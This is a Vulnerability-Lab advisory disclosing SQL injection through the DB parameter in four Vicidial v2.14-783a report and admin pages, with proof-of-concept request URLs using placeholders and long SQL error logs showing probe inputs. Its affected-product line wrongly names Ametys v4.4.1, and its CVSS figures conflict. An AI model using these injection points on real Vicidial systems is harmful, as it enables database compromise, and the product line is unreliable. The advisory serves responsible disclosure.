<pre><code>Document Title:<br />===============<br />Vicidial v2.14-783a - (DB) SQL Injection Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2312<br /><br /><br />Release Date:<br />=============<br />2022-02-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2312<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.3<br /><br /><br />Vulnerability Class:<br />====================<br />SQL Injection<br /><br /><br />Current Estimated Price:<br />========================<br />1.000€ - 2.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Vicidial is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act<br />as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an<br />interactive set of web pages that work through a web browser to give real-time information and functionality with<br />nothing more than an internet browser on the client computer. The management interface is also web-based and<br />offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options<br />and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound<br />fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only<br />have a phone. There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around<br />the world, several with over 300 agent seats and many with multiple locations.<br /><br />(Copy of the Homepage:https://www.vicidial.org/vicidial.php )<br />(Download:https://www.vicidial.org/vicidial.php )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a sql-injection web vulnerability in the Vicidial v2.14-783a web-application.<br /><br />Affected Product(s):<br />====================<br />Vicidial Group<br />Product: Ametys v4.4.1 - Content Management System (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-02: Researcher Notification & Coordination (Security Researcher)<br />2022-01-03: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-02-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A remote sql injection web vulnerability has been discovered in the official Vicidial v2.14-783a web-application.<br />The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or connected dbms.<br /><br />The vulnerability is located in the `DB` parameter of the `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_usergroup_login_report.php`<br />and `admin_lists_custom.php` files. Remote attackers are able to execute sql commands by injection of malicious statements via GET method<br />request by the DB parameter.<br /><br />The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.<br />Exploitation of the remote sql injection web vulnerabilities requires no user interaction but a agent or moderator web-application user account.<br />Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.<br /><br />Request Method(s):<br />[+] GET<br /><br />Vulnerable File(s):<br />[+] AST_IVRstats.php<br />[+] AST_LISTS_pass_report.php<br />[+] AST_usergroup_login_report.php<br />[+] admin_lists_custom.php<br /><br />Vulnerable Parameter(s):<br />[+] DB<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The remote sql-injection web vulnerability can be exploited by privileged user with agent or manager access without user interaction.<br />For security demontration or to reproduce the security vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[SQL-INJECTION!]&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59<br />https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=[SQL-INJECTION!]&use_lists=&report_display_type=HTML&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/AST_usergroup_login_report.php?DB=[SQL-INJECTION!]&type=&user_group[]=001&report_display_type=HTML&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente&field_type=TEXT&field_duplicate=N&DB=[SQL-INJECTION!]<br />https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD&list_id=108&field_id=134&field_label=nominteres&field_type=TEXT&field_duplicate=N&ConFiRm=YES&DB=[SQL-INJECTION!]<br /><br /><br />SQL-Exception Logs ---<br />SELECT use_non_latin,outbound_autodial_active,slave_db_server,reports_use_slave_db,enable_languages,language_method,report_<br />default_format FROM system_settings; |SELECT user_group from vicidial_users where user='1';| |SELECT allowed_campaigns,allowed_<br />reports,admin_viewable_groups,admin_viewable_call_times from vicidial_user_groups where user_group='ADMIN';| |SELECT count(*)<br />from vicidial_inbound_groups where group_id='CALL_MENU';| |SELECT count(*) from vicidial_inbound_groups where group_id='XML_PULL';|<br />select group_id,group_name from vicidial_inbound_groups order by group_id; select vsc_id,vsc_name from vicidial_status_categories; Inbound IVR Report<br />-<br />|SELECT selected_language from vicidial_users where user='1';| |SELECT count(*) from vicidial_users where user='1' and user_level ><br />7 and view_reports='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 6 and view_reports='1';| SELECT webserver_id<br />FROM vicidial_webservers where webserver='www.vidicial.localhost:8080' and hostname='public' LIMIT 1; |INSERT INTO vicidial_report_log set<br />event_date=NOW(), user='1', ip_address='13.73.13.7', report_name='Inbound IVR Report', browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64;<br />rv:95.0) Gecko/20100101 Firefox/95.0', referer='', notes='www.vidicial.localhost:8080: /vicidial/AST_IVRstats.php |, 00:00:00, 23:59:59, ALL, ,<br />HTML|', url='https://www.vidicial.localhost:8080/vicidial/AST_IVRstats.php?DB=%22%3E%3C%3E%20%3E%22%3C%20src=a%3E&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML', webserver='1';<br />| SELECT menu_background,frame_background,std_row1_background,std_row2_background,std_row3_background,std_row4_background,std_row5_background,<br />alt_row1_background,alt_row2_background,alt_row3_background,web_logo,button_color FROM vicidial_screen_colors where colors_id='SpecialTheme';<br />-<br /> SELECT use_non_latin,outbound_autodial_active,slave_db_server,reports_use_slave_db,enable_languages,language_method,report_default_format FROM<br />system_settings; |SELECT user_group from vicidial_users where user='1';| |SELECT allowed_campaigns,allowed_reports from vicidial_user_groups where<br />user_group='ADMIN';| select campaign_id,campaign_name from vicidial_campaigns where campaign_id IN('','01','1000000','2525','27011987','291471','34536663','4444test','456456','4rentena','5001','5011','5151','5269','54321','554','5556','5584',<br />'5678','5696','5888','6001','60606060','636363','6545','666555','132','6692','6789','69001','6969','70000','75465456','770077','777111','777777',<br />'77788812','778888','7997','8000','80001','8001','8006','8010','8080','808080','83439860','83439866','8631','8787451','880088','8974257','8985',<br />'90099','9010','9087','91224500','95868686','963852','98765','995813','9988','999','9998','ABITEST','ABI_IN','ABNOY','AC','Aribau','attack','AU2018',<br />'Ausie','AUS_LAND','AUTODIAL','Awesome','az_camp_','BESTEKA','binay','bmcamp','BOOMBOOM','CAMP','Camp69','campaa','CampPain','CB19IB','ceidg','CERTH'<br />,'chupa','comgivre','COS','cs54','CSPFC','CS_RO','CS_Test','CWMEM1','Cyburity','cyfuture','DABG','dardnoc_','DIRECTV','dishnet','dummy','Envy_it','FE'<br />,'ggg','hahahaID','HDCUSTM1','INBOUND','inbound5','inbound_','Incred1','ittcr','JGSCAMP','JOMS13','Jtesting','karn_edu','LAB001','lenovo','MANU','meh'<br />,'metst','mohsin11','moneytra','myCamp11','myfirst','nabil','new11111','NewDemo','Nighting','norm_sub','nowa','OBD_CH','Opros','OUT','Out01','outbroad<br />','papa23','PBN','PERUVENT','PERZIN','Pious_Jo','PLD','press1u','Press1UK','radhika','raja','rataninb','ratanout','real_198','recsurve','SAMPLE','sb','<br />SBD','SISVER','Swabb','TAX','test001','TEST1','test12','TESTCAM1','testout','testoutc','Test_ant','Test_Ind','TEST_KAY','Test_SD','Trend','tttttttt',<br />'tutabie','VBotCam','Manislc','588','ddd5','campA','campB1','campC','campD','Testcomp','Chidamb','slc13000','gr','solarSnk','RubixMP','2025','63111',<br />'INDIACAM','jkhkuj','12322','140292','678678','gino','8600061','0408','18241','suraj880','5<br />0001','001','Johnson','chat','chat_202','Recr0111','11223344','353621','8564','allstat','88854','101','pl','MANI_123','80000','Test608','OutRe1','UKOUT',<br />'TSTTSTTS','Mikano_o','3413','GABBY','10005','3241','nat2021','prueba','PabuIN','Youth','5002','HDFC','121','HDFCV','You','jjtest1','jomsCAMP','808182',<br />'gabbycam','gabbyca2','1522','69696969','10112103','smartbro','ast_test','12345abc','2259','62626','12000','1010','btibd') order by campaign_id; select status,human_answered,sale,dnc,customer_contact,not_interested,unworkable,scheduled_callback,completed,status_name from vicidial_statuses; select status,human_answered,sale,dnc,customer_contact,not_interested,unworkable,scheduled_callback,completed,status_name from vicidial_campaign_statuses<br />where selectable IN('Y','N'); Lists Pass Report HELP<br />-<br />|SELECT selected_language from vicidial_users where user='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 7 and view_reports='1';|<br />|SELECT count(*) from vicidial_users where user='1' and user_level > 6 and view_reports='1';| SELECT webserver_id FROM vicidial_webservers where<br />webserver='www.vidicial.localhost:8080' and hostname='public' LIMIT 1; |INSERT INTO vicidial_report_log set event_date=NOW(), user='1', ip_address='13.73.13.7',<br />report_name='Lists Pass Report', browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', referer='',<br />notes='www.vidicial.localhost:8080: /vicidial/AST_LISTS_pass_report.php |, , , , , HTML|', url='https://www.vidicial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=<br />-1%27&use_lists=&report_display_type=HTML&SUBMIT=SUBMIT', webserver='1';| SELECT menu_background,frame_background,std_row1_background,std_row2_background,<br />std_row3_background,std_row4_background,std_row5_background,alt_row1_background,<br />alt_row2_background,alt_row3_background,web_logo,button_color FROM vicidial_screen_colors where colors_id='SpecialTheme';<br />-<br />|SELECT selected_language from vicidial_users where user='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 7 and view_reports='1';|<br /> |SELECT count(*) from vicidial_users where user='1' and user_level > 6 and view_reports='1';| SELECT webserver_id FROM vicidial_webservers where webserver=<br />'www.vidicial.localhost:8080' and hostname='public' LIMIT 1; |INSERT INTO vicidial_report_log set event_date=NOW(), user='1', ip_address='13.73.13.7', report_name='<br />User Group Login Report', browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', referer='', notes='www.vidicial.localhost:8080:<br />/vicidial/AST_usergroup_login_report.php |, , , , , HTML|', url='https://www.vidicial.localhost:8080/vicidial/AST_usergroup_login_report.php<br />?DB=-1%27&type=&user_group[]=001&report_display_type=HTML&SUBMIT=SUBMIT', webserver='1';| SELECT menu_background,frame_background,std_row1_background,<br />std_row2_background,std_row3_background,std_row4_background,std_row5_background,<br />alt_row1_background,alt_row2_background,alt_row3_background,web_logo,button_color FROM vicidial_screen_colors where colors_id='SpecialTheme';<br />-<br /> SELECT use_non_latin,outbound_autodial_active,slave_db_server,reports_use_slave_db,enable_languages,language_method,report_default_format FROM system_settings;<br />|SELECT user_group from vicidial_users where user='1';| |SELECT allowed_campaigns,allowed_reports,admin_viewable_groups,admin_viewable_call_times from<br />vicidial_user_groups where user_group='ADMIN';| select user_group from vicidial_user_groups order by user_group; |001||1|&user_group[]=001|1<br />-<br />SELECT use_non_latin,webroot_writable,outbound_autodial_active,user_territories_active,custom_fields_enabled,enable_languages,language_method,active_modules<br />FROM system_settings; |SELECT selected_language from vicidial_users where user='1';| |SELECT selected_language from vicidial_users where user='1';| ,DELETE_CUSTOM_FIELD_CONFIRMATION,94.242.243.162,1,,133,108,,idcliente,,,,,TEXT,,1,1,,,,,,,,,NSELECT count(*) from vicidial_lists_fields where list_id='108'<br />and field_label='idcliente';SHOW TABLES LIKE "custom_108";|1|1<br /><br /><br />Security Risk:<br />==============<br />The security risk of the remote sql-injection web vulnerability in the vicidial web-application is estimated as high.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>